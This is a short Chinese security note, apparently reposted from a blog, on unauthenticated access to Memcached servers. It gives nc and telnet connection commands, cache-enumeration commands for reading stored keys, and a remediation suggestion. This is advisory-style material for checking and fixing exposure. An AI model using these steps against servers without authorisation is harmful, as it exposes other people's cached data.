memcached未授权
漏洞成因:
Memcached端口是对外开放的,用nc或Telne可以直接登录,查看信息,增加修改都可以。
nc -vv 1.2.3.4 11211
telnet 1.2.3.4 11211
验证读取key:
stats
stats items
stats cachedump 22 0
get kkkkkkkkkkkk
修复建议:
memcached设置监听内网或配置防火墙限制非必要的远程访问
memcached未授权
原文作者:memcached
原文地址: https://www.cnblogs.com/i-honey/p/9333135.html
本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
原文地址: https://www.cnblogs.com/i-honey/p/9333135.html
本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
